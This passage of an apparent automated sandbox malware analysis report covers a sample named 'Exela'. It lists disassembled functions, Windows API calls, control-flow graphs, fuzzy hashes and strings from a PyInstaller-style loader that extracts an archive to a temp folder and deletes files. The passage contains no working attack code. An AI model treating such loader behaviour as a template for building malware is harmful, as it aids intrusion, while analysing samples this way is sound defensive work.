                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction ID: ee3efea50d0d48c4bde0f0a6c6a8b7b33c35aff29d8b17df749b4ce14cdfd268
                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction Fuzzy Hash: 20C1EF32B28A6986FB10EFA4C4962AC7761FB49B98F885375DB6E57394CF38D411C310
                                                                                                    Function 00007FF75AE983B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9841B
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9849E
                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984BD
                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984CB
                                                                                                    • FindClose.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984DC
                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                    • String ID: %s\*
                                                                                                    • API String ID: 1057558799-766152087
                                                                                                    • Opcode ID: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
                                                                                                    • Instruction ID: 709c6038febe3ce181d98b084f7fc6d58cae5cb6ff821833daea625e506cd7e4
                                                                                                    • Opcode Fuzzy Hash: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
                                                                                                    • Instruction Fuzzy Hash: E741A431A0C76699FA20BB24E44A9BDA760FF94750FC80276D95D436E4DF3CD946CB20
                                                                                                    Function 00007FF75AEB5EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1012 7ff75aeb5eec-7ff75aeb5f21 call 7ff75aeb55f8 call 7ff75aeb5600 call 7ff75aeb5668 1019 7ff75aeb605f-7ff75aeb60cd call 7ff75aeaa970 call 7ff75aeb15e8 1012->1019 1020 7ff75aeb5f27-7ff75aeb5f32 call 7ff75aeb5608 1012->1020 1032 7ff75aeb60cf-7ff75aeb60d6 1019->1032 1033 7ff75aeb60db-7ff75aeb60de 1019->1033 1020->1019 1025 7ff75aeb5f38-7ff75aeb5f43 call 7ff75aeb5638 1020->1025 1025->1019 1031 7ff75aeb5f49-7ff75aeb5f6c call 7ff75aeaa9b8 GetTimeZoneInformation 1025->1031 1046 7ff75aeb5f72-7ff75aeb5f93 1031->1046 1047 7ff75aeb6034-7ff75aeb605e call 7ff75aeb55f0 call 7ff75aeb55e0 call 7ff75aeb55e8 1031->1047 1034 7ff75aeb616b-7ff75aeb616e 1032->1034 1036 7ff75aeb60e0 1033->1036 1037 7ff75aeb6115-7ff75aeb6128 call 7ff75aead66c 1033->1037 1039 7ff75aeb60e3 1034->1039 1040 7ff75aeb6174-7ff75aeb617c call 7ff75aeb5c70 1034->1040 1036->1039 1050 7ff75aeb6133-7ff75aeb614e call 7ff75aeb15e8 1037->1050 1051 7ff75aeb612a 1037->1051 1044 7ff75aeb60e8-7ff75aeb6114 call 7ff75aeaa9b8 call 7ff75ae9c5c0 1039->1044 1045 7ff75aeb60e3 call 7ff75aeb5eec 1039->1045 1040->1044 1045->1044 1053 7ff75aeb5f95-7ff75aeb5f9b 1046->1053 1054 7ff75aeb5f9e-7ff75aeb5fa5 1046->1054 1071 7ff75aeb6150-7ff75aeb6153 1050->1071 1072 7ff75aeb6155-7ff75aeb6167 call 7ff75aeaa9b8 1050->1072 1059 7ff75aeb612c-7ff75aeb6131 call 7ff75aeaa9b8 1051->1059 1053->1054 1055 7ff75aeb5fb9 1054->1055 1056 7ff75aeb5fa7-7ff75aeb5faf 1054->1056 1063 7ff75aeb5fbb-7ff75aeb602f call 7ff75aeba540 * 4 call 7ff75aeb2bcc call 7ff75aeb6184 * 2 1055->1063 1056->1055 1061 7ff75aeb5fb1-7ff75aeb5fb7 1056->1061 1059->1036 1061->1063 1063->1047 1071->1059 1072->1034
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F1A
                                                                                                      • Part of subcall function 00007FF75AEB5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB567C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F2B
                                                                                                      • Part of subcall function 00007FF75AEB5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB561C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F3C
                                                                                                      • Part of subcall function 00007FF75AEB5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB564C
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75AEB617C), ref: 00007FF75AEB5F63
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 3458911817-239921721
                                                                                                    • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                    • Instruction ID: 434c2a0d6dcaf9cf54c9a4d6a32f24e3b50ce587ed8d484ceb3794a820684f46
                                                                                                    • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                    • Instruction Fuzzy Hash: 2551A432A0876686F760FF25E5975A9E350BF48784FCC4279EA4D43696DF3CE8018760
                                                                                                    Function 00007FF75AE992F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                    • Instruction ID: d28007797e316ee1e134623854a8434a5f6d3804ae729b7e3fa2ae69a2b0a515
                                                                                                    • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                    • Instruction Fuzzy Hash: 57F0C822A187518AF760BF60B45A76AB350AF84324F8C4335D9AD027E4DF3CD4488A10
                                                                                                    Function 00007FF75AEB0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 1010374628-0
                                                                                                    • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                    • Instruction ID: 2eee3a1608a7673bd6efa5f382ff8a6b701f9dfea337a90977b599691ea146da
                                                                                                    • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                    • Instruction Fuzzy Hash: 4202AC21B0D77A41FAA6BB11A44B279A690AF45BA0FCD87B4DD5D473D2DE3DB8018330
                                                                                                    Function 00007FF75AE91950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 329 7ff75ae91950-7ff75ae9198b call 7ff75ae945b0 332 7ff75ae91991-7ff75ae919d1 call 7ff75ae97f80 329->332 333 7ff75ae91c4e-7ff75ae91c72 call 7ff75ae9c5c0 329->333 338 7ff75ae919d7-7ff75ae919e7 call 7ff75aea0744 332->338 339 7ff75ae91c3b-7ff75ae91c3e call 7ff75aea00bc 332->339 344 7ff75ae91a08-7ff75ae91a24 call 7ff75aea040c 338->344 345 7ff75ae919e9-7ff75ae91a03 call 7ff75aea4f78 call 7ff75ae92910 338->345 343 7ff75ae91c43-7ff75ae91c4b 339->343 343->333 351 7ff75ae91a45-7ff75ae91a5a call 7ff75aea4f98 344->351 352 7ff75ae91a26-7ff75ae91a40 call 7ff75aea4f78 call 7ff75ae92910 344->352 345->339 358 7ff75ae91a7b-7ff75ae91afc call 7ff75ae91c80 * 2 call 7ff75aea0744 351->358 359 7ff75ae91a5c-7ff75ae91a76 call 7ff75aea4f78 call 7ff75ae92910 351->359 352->339 371 7ff75ae91b01-7ff75ae91b14 call 7ff75aea4fb4 358->371 359->339 374 7ff75ae91b35-7ff75ae91b4e call 7ff75aea040c 371->374 375 7ff75ae91b16-7ff75ae91b30 call 7ff75aea4f78 call 7ff75ae92910 371->375 381 7ff75ae91b6f-7ff75ae91b8b call 7ff75aea0180 374->381 382 7ff75ae91b50-7ff75ae91b6a call 7ff75aea4f78 call 7ff75ae92910 374->382 375->339 388 7ff75ae91b8d-7ff75ae91b99 call 7ff75ae92710 381->388 389 7ff75ae91b9e-7ff75ae91bac 381->389 382->339 388->339 389->339 392 7ff75ae91bb2-7ff75ae91bb9 389->392 395 7ff75ae91bc1-7ff75ae91bc7 392->395 396 7ff75ae91be0-7ff75ae91bef 395->396 397 7ff75ae91bc9-7ff75ae91bd6 395->397 396->396 398 7ff75ae91bf1-7ff75ae91bfa 396->398 397->398 399 7ff75ae91c0f 398->399 400 7ff75ae91bfc-7ff75ae91bff 398->400 401 7ff75ae91c11-7ff75ae91c24 399->401 400->399 402 7ff75ae91c01-7ff75ae91c04 400->402 403 7ff75ae91c26 401->403 404 7ff75ae91c2d-7ff75ae91c39 401->404 402->399 405 7ff75ae91c06-7ff75ae91c09 402->405 403->404 404->339 404->395 405->399 406 7ff75ae91c0b-7ff75ae91c0d 405->406 406->401
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE97F80: _fread_nolock.LIBCMT ref: 00007FF75AE9802A
                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF75AE91A1B
                                                                                                      • Part of subcall function 00007FF75AE92910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                    • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                    • Instruction ID: 58affc7623e1bb6c5573197db563d731b501ef89910778927b89facaf8a57c6b
                                                                                                    • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                    • Instruction Fuzzy Hash: D481D671A0C7A68AFB60FB14D4466F9A390EF48784FC84171EA4D43786DE3CE5858760
                                                                                                    Function 00007FF75AE91600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 407 7ff75ae91600-7ff75ae91611 408 7ff75ae91613-7ff75ae9161c call 7ff75ae91050 407->408 409 7ff75ae91637-7ff75ae91651 call 7ff75ae945b0 407->409 414 7ff75ae9162e-7ff75ae91636 408->414 415 7ff75ae9161e-7ff75ae91629 call 7ff75ae92710 408->415 416 7ff75ae91682-7ff75ae9169c call 7ff75ae945b0 409->416 417 7ff75ae91653-7ff75ae91681 call 7ff75aea4f78 call 7ff75ae92910 409->417 415->414 424 7ff75ae916b8-7ff75ae916cf call 7ff75aea0744 416->424 425 7ff75ae9169e-7ff75ae916b3 call 7ff75ae92710 416->425 432 7ff75ae916d1-7ff75ae916f4 call 7ff75aea4f78 call 7ff75ae92910 424->432 433 7ff75ae916f9-7ff75ae916fd 424->433 431 7ff75ae91821-7ff75ae91824 call 7ff75aea00bc 425->431 438 7ff75ae91829-7ff75ae9183b 431->438 448 7ff75ae91819-7ff75ae9181c call 7ff75aea00bc 432->448 436 7ff75ae916ff-7ff75ae9170b call 7ff75ae91210 433->436 437 7ff75ae91717-7ff75ae91737 call 7ff75aea4fb4 433->437 443 7ff75ae91710-7ff75ae91712 436->443 445 7ff75ae91761-7ff75ae9176c 437->445 446 7ff75ae91739-7ff75ae9175c call 7ff75aea4f78 call 7ff75ae92910 437->446 443->448 450 7ff75ae91802-7ff75ae9180a call 7ff75aea4fa0 445->450 451 7ff75ae91772-7ff75ae91777 445->451 461 7ff75ae9180f-7ff75ae91814 446->461 448->431 450->461 454 7ff75ae91780-7ff75ae917a2 call 7ff75aea040c 451->454 462 7ff75ae917a4-7ff75ae917bc call 7ff75aea0b4c 454->462 463 7ff75ae917da-7ff75ae917e6 call 7ff75aea4f78 454->463 461->448 469 7ff75ae917c5-7ff75ae917d8 call 7ff75aea4f78 462->469 470 7ff75ae917be-7ff75ae917c1 462->470 468 7ff75ae917ed-7ff75ae917f8 call 7ff75ae92910 463->468 476 7ff75ae917fd 468->476 469->468 470->454 473 7ff75ae917c3 470->473 473->476 476->450
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                    • API String ID: 2050909247-1550345328
                                                                                                    • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                    • Instruction ID: 776d906da119d5d27130256d0e3fb402130479796d512671bfd60679ec5532e4
                                                                                                    • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                    • Instruction Fuzzy Hash: 5651BD61F087678AFA10BB11A8069B9E390BF45794FCC46B1EE0C07792DF3CE9459360
                                                                                                    Function 00007FF75AE98850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF75AE93CBB), ref: 00007FF75AE988F4
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF75AE93CBB), ref: 00007FF75AE988FA
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00007FF75AE93CBB), ref: 00007FF75AE9893C
                                                                                                      • Part of subcall function 00007FF75AE98A20: GetEnvironmentVariableW.KERNEL32(00007FF75AE9388E), ref: 00007FF75AE98A57
                                                                                                      • Part of subcall function 00007FF75AE98A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF75AE98A79
                                                                                                      • Part of subcall function 00007FF75AEA82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEA82C1
                                                                                                      • Part of subcall function 00007FF75AE92810: MessageBoxW.USER32 ref: 00007FF75AE928EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                    • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                    • Instruction ID: 9db4264300ae4e75d5aa598b8ac555c918be469d190e502191a7670588a82f47
                                                                                                    • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                    • Instruction Fuzzy Hash: B341A011A1976249FA24FB25A85B6FAD390AF88780FCC51B1ED0D477E6DE3CE901C320
                                                                                                    Function 00007FF75AE91210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 754 7ff75ae91210-7ff75ae9126d call 7ff75ae9bdf0 757 7ff75ae9126f-7ff75ae91296 call 7ff75ae92710 754->757 758 7ff75ae91297-7ff75ae912af call 7ff75aea4fb4 754->758 763 7ff75ae912b1-7ff75ae912cf call 7ff75aea4f78 call 7ff75ae92910 758->763 764 7ff75ae912d4-7ff75ae912e4 call 7ff75aea4fb4 758->764 775 7ff75ae91439-7ff75ae9144e call 7ff75ae9bad0 call 7ff75aea4fa0 * 2 763->775 770 7ff75ae912e6-7ff75ae91304 call 7ff75aea4f78 call 7ff75ae92910 764->770 771 7ff75ae91309-7ff75ae9131b 764->771 770->775 774 7ff75ae91320-7ff75ae91345 call 7ff75aea040c 771->774 781 7ff75ae91431 774->781 782 7ff75ae9134b-7ff75ae91355 call 7ff75aea0180 774->782 791 7ff75ae91453-7ff75ae9146d 775->791 781->775 782->781 790 7ff75ae9135b-7ff75ae91367 782->790 792 7ff75ae91370-7ff75ae91398 call 7ff75ae9a230 790->792 795 7ff75ae91416-7ff75ae9142c call 7ff75ae92710 792->795 796 7ff75ae9139a-7ff75ae9139d 792->796 795->781 797 7ff75ae9139f-7ff75ae913a9 796->797 798 7ff75ae91411 796->798 800 7ff75ae913d4-7ff75ae913d7 797->800 801 7ff75ae913ab-7ff75ae913b9 call 7ff75aea0b4c 797->801 798->795 802 7ff75ae913d9-7ff75ae913e7 call 7ff75aeb9ea0 800->802 803 7ff75ae913ea-7ff75ae913ef 800->803 807 7ff75ae913be-7ff75ae913c1 801->807 802->803 803->792 806 7ff75ae913f5-7ff75ae913f8 803->806 809 7ff75ae913fa-7ff75ae913fd 806->809 810 7ff75ae9140c-7ff75ae9140f 806->810 811 7ff75ae913cf-7ff75ae913d2 807->811 812 7ff75ae913c3-7ff75ae913cd call 7ff75aea0180 807->812 809->795 813 7ff75ae913ff-7ff75ae91407 809->813 810->781 811->795 812->803 812->811 813->774
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                    • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                    • Instruction ID: 18baeaa694f97a44c889729e513fec92477014abfdaf4d8995048c13593bb700
                                                                                                    • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                    • Instruction Fuzzy Hash: 2D51B322A0876249FA60BB11A8427BAE2D1BF85794FCC4275EE4D477D5EF3CE905C720
                                                                                                    Function 00007FF75AEAED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF75AEAF11A,?,?,-00000018,00007FF75AEAADC3,?,?,?,00007FF75AEAACBA,?,?,?,00007FF75AEA5FAE), ref: 00007FF75AEAEEFC
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF75AEAF11A,?,?,-00000018,00007FF75AEAADC3,?,?,?,00007FF75AEAACBA,?,?,?,00007FF75AEA5FAE), ref: 00007FF75AEAEF08
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
